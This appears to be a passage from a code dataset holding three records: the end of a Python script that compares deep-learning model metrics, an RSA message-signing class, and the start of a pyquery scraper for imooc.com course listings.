range(len(df)):\n avg = np.round(np.mean(df.iloc[i,1:]),4)\n avgs.append(avg)\n dev_ = np.round(np.std(df.iloc[i,1:]),4)\n dev.append(dev_)\n df['Average'] 
= avgs\n df['standard dev'] = dev\n\n plt.figure(figsize=(20, 15))\n plt.bar(range(len(df['Average'])),df['Average'], yerr=df['standard dev'] , alpha=0.8,\n color = ['black','brown','red','orange','yellow','limegreen','lime','cyan','teal',\n 'deepskyblue','olive','navy','violet','purple','slategray'],\n \n align='center', ecolor='black', capsize=10)\n \n plt.plot(df['Average'],linewidth=2, markersize=12)\n # ,color = 'cyan')\n # plt.legend(fontsize=15)\n plt.title('Models '+name,fontsize=26, fontweight='bold')\n plt.xlabel('Models',fontsize=22, fontweight='bold')\n plt.ylabel(name,fontsize=22, fontweight='bold')\n plt.xticks(range(len(df['models'])),df['models'],rotation = 45,fontsize=22, fontweight='bold')\n plt.yticks(fontsize=20, fontweight='bold')\n plt.tight_layout()\n plt.ylim(0.0, 1.0)\n plt.gca().yaxis.grid(True)\n plt.savefig(os.path.join('output', name+'.png'))\n plt.close('all')\n\n return df\n\n\ndf = pd.DataFrame.from_dict(m.accuracies)\ndf = avgs_std_dev(df,name = 'accuracies')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','accuracies.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.cohen_kappa_score)\ndf = avgs_std_dev(df,name = 'cohen_kappa_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','cohen_kappa_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.roc_auc_score)\ndf = avgs_std_dev(df,name = 'roc_auc_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','roc_auc_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.f1_score)\ndf = avgs_std_dev(df,name = 'f1_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','f1_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.precision_score)\ndf = avgs_std_dev(df,name = 'precision_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','precision_score.csv'),index = False)\n\n\ndf = pd.DataFrame.from_dict(m.recall_score)\ndf = avgs_std_dev(df,name = 'recall_score')\ndf = m.perform_t_test(df)\ndf.to_csv(os.path.join('output','recall_score.csv'),index = False)\n\n# !zip -r /content/output.zip /content/output", "repo_name": "Rehan0546/deeplearning_models_stacking", "sub_path": "subject_classification.py", "file_name": "subject_classification.py", "file_ext": "py", "file_size_in_byte": 37874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.random.set_seed", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "warnings.filterwarnings", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Layer", "line_number": 53, "usage_type": "name"}, {"api_name": "keras.backend.cast_to_floatx", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 57, "usage_type": "name"}, {"api_name": "keras.backend.expand_dims", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 67, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.backend.pow", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.backend.exp", "line_number": 69, 
"usage_type": "call"}, {"api_name": "keras.backend", "line_number": 69, "usage_type": "name"}, {"api_name": "scipy.stats.ttest_rel", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 197, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 199, "usage_type": "call"}, {"api_name": "sklearn.metrics.cohen_kappa_score", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 201, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 204, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 206, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 208, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 211, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 212, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 218, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 234, "usage_type": "call"}, {"api_name": "os.path", "line_number": 234, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 239, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv1D", "line_number": 241, "usage_type": "call"}, {"api_name": 
"tensorflow.keras.layers.Conv1D", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.SpatialDropout1D", "line_number": 250, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 255, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 261, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 262, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 265, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 266, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 275, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 278, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.SpatialDropout1D", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 289, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 291, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 301, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 303, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 306, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.SpatialDropout1D", "line_number": 309, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling1D", "line_number": 310, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 314, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 316, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 318, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 320, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 323, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 324, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 330, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.EarlyStopping", "line_number": 338, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ReduceLROnPlateau", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 366, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 366, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 374, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 374, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 375, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 375, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 376, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 377, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 380, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 380, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 381, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 381, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 386, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 386, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 387, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 390, "usage_type": "call"}, {"api_name": "os.path", "line_number": 390, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 392, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 392, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 393, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 393, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 
393, "usage_type": "call"}, {"api_name": "os.path", "line_number": 393, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 397, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 397, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 402, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 442, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 443, "usage_type": "call"}, {"api_name": "os.path", "line_number": 443, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 445, "usage_type": "call"}, {"api_name": "os.path", "line_number": 445, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 446, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 461, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.concatenate", "line_number": 466, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 467, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 469, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 471, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 473, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 474, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 475, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 483, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 489, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 491, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Add", "line_number": 493, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 493, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Add", "line_number": 494, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 494, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Add", "line_number": 495, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 495, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.concatenate", "line_number": 497, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 507, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 512, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.CategoricalCrossentropy", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 521, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 521, "usage_type": "call"}, {"api_name": "os.path", "line_number": 521, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, 
"usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 523, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 523, "usage_type": "call"}, {"api_name": "os.path", "line_number": 523, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 540, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 543, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 547, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 548, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 555, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 555, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 563, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 568, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 576, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 576, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path", "line_number": 586, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 594, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 609, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 610, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 610, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 612, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 612, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 613, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 613, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 615, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 615, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 616, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 616, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 617, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 617, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 618, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 618, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 619, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 619, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 620, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 620, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 620, "usage_type": "call"}, {"api_name": "os.path", "line_number": 620, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 
621, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 621, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 655, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 657, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 660, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 664, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 738, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path", "line_number": 822, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 826, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 896, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 896, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 901, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 901, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 902, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 902, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 908, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 908, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 911, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 911, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 912, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 912, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 913, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 913, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 914, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 914, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 915, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 915, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 916, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 916, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 917, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 917, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 918, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 918, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 919, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 919, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 919, "usage_type": "call"}, {"api_name": "os.path", "line_number": 919, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 920, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 920, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 925, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 925, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 928, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 928, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 931, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 931, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 934, "usage_type": "call"}, {"api_name": "os.path", "line_number": 934, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 937, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 937, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 940, "usage_type": "call"}, {"api_name": "os.path", "line_number": 940, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 943, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 943, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 946, "usage_type": "call"}, {"api_name": "os.path", "line_number": 946, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 949, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 949, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 952, "usage_type": "call"}, {"api_name": "os.path", "line_number": 952, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 955, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 955, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 958, "usage_type": "call"}, {"api_name": "os.path", "line_number": 958, "usage_type": "attribute"}]} +{"seq_id": "4459679659", "text": "# -*- coding:utf-8 -*-\nimport base64\nimport os\n\n\n__author__ = [\n '\"liubo\" <liubo@51domi.com>'\n]\n\n\nclass RSASigner():\n def __init__(self, app_id):\n from Crypto.PublicKey import RSA\n from luhu_biz.orm.coop_app import CoopApp\n\n if app_id == \"luhu\":\n public_key = open('%s/keys/luhu_rsa_public_key.pem' % os.path.split(os.path.realpath(__file__))[0],\n 'r').read()\n else:\n public_key = CoopApp.get(app_id).public_key\n self.public_key = RSA.importKey(public_key)\n self.private_key = RSA.importKey(\n open('%s/keys/luhu_rsa_private_key.pem' % os.path.split(os.path.realpath(__file__))[0],\n 'r').read())\n\n def sign(self, message):\n '''\n @param message: 需要签名的字符串\n '''\n from Crypto.Hash import SHA\n from Crypto.Signature import PKCS1_v1_5 as pk\n from Crypto.Random import atfork\n\n atfork()\n digest = SHA.new(message)\n signer = pk.new(self.private_key)\n signed_message = signer.sign(digest)\n signed_message = base64.b64encode(signed_message)\n return signed_message\n\n def verify(self, message, sign):\n from Crypto.Hash import SHA\n from Crypto.Signature import PKCS1_v1_5 as pk\n\n sign = base64.b64decode(sign)\n verifier = pk.new(self.public_key)\n if verifier.verify(SHA.new(message), sign):\n return True\n else:\n return False\n\n", "repo_name": "sluggard6/bgirl", "sub_path": "bg_biz/pay/sign/rsa.py", "file_name": "rsa.py", "file_ext": "py", "file_size_in_byte": 1508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.split", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 17, "usage_type": "call"}, {"api_name": "luhu_biz.orm.coop_app.CoopApp.get", "line_number": 20, "usage_type": "call"}, {"api_name": "luhu_biz.orm.coop_app.CoopApp", 
"line_number": 20, "usage_type": "name"}, {"api_name": "Crypto.PublicKey.RSA.importKey", "line_number": 21, "usage_type": "call"}, {"api_name": "Crypto.PublicKey.RSA", "line_number": 21, "usage_type": "name"}, {"api_name": "Crypto.PublicKey.RSA.importKey", "line_number": 22, "usage_type": "call"}, {"api_name": "Crypto.PublicKey.RSA", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 23, "usage_type": "call"}, {"api_name": "Crypto.Random.atfork", "line_number": 34, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA.new", "line_number": 35, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA", "line_number": 35, "usage_type": "name"}, {"api_name": "Crypto.Signature.PKCS1_v1_5.new", "line_number": 36, "usage_type": "call"}, {"api_name": "Crypto.Signature.PKCS1_v1_5", "line_number": 36, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 38, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 45, "usage_type": "call"}, {"api_name": "Crypto.Signature.PKCS1_v1_5.new", "line_number": 46, "usage_type": "call"}, {"api_name": "Crypto.Signature.PKCS1_v1_5", "line_number": 46, "usage_type": "name"}, {"api_name": "Crypto.Hash.SHA.new", "line_number": 47, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "42784308810", "text": "import re\r\nimport os\r\nimport thre\r\nimport requests\r\nfrom pyquery import PyQuery as q\r\n\r\n\r\ndef fit3_1(url):\r\n s = q(url, headers=headers)\r\n r = s('div').filter('.moco-course-wrap')\r\n for i in r:\r\n link = re.findall(r'learn/\\d{1,6}(?=\")', str(q(i)))\r\n if link:\r\n ur = 'http://www.imooc.com/' + link[-1]\r\n print(ur)\r\n fit2(ur)\r\n\r\ndef fit4(url):\r\n s = q(url, headers=headers)\r\n r = s('div').filter('.item')\r\n link = re.findall(r'c=.+?(?=\")', str(r))\r\n for li in link:\r\n url = 'http://www.imooc.com/course/list?' 
